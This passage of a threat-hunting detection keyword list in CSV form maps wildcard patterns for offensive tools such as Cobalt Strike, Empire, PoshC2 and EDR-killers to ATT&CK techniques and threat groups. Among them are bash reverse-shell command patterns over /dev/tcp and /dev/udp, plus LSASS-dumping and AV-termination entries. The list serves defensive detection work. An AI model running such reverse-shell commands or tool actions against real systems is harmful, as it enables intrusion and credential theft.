T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*setup_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Set-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*seventeenman/CallBackDump*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*sfp_portscan_tcp.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*sfp_torexits.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*sftp *@*:* *","greyware_tool_keyword","sftp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*sh >/dev/tcp/* <&1 2>&1*","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*sh -i >& /dev/udp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*Sha-2-*512.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-384.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*shadawck/glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*shadawck/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*shadawck/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*shadow_copy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*shadowclock*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shadowclone *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shadowcoerce.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*shadowcoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*shadowcopy enum*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*shadowdump.*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*ShadowForge.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*ShadowForgeC2-main*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*ShadowSpray recovered*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.Asn1*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.exe*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.Kerb*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray.sln*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowSpray-master*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*ShadowUser/scvhost.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*shareenum.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*shareenumeration*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SharepointExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*SharepointSiteExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*Shares/cme_spider_plus*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Shares/finduncshar_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*sharkd -a tcp:*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Sharp Compile*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*Sharp_v4_x64*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Sharp_v4_x86*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpadidnsdump.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpAdidnsdumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpAdidnsdumpMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpAllowedToAct.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpapplocker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpAppLocker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpAzbelt-main*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*SharpBlackout* -p *","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackOut.csproj*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackout.exe*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackOut.pdb*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 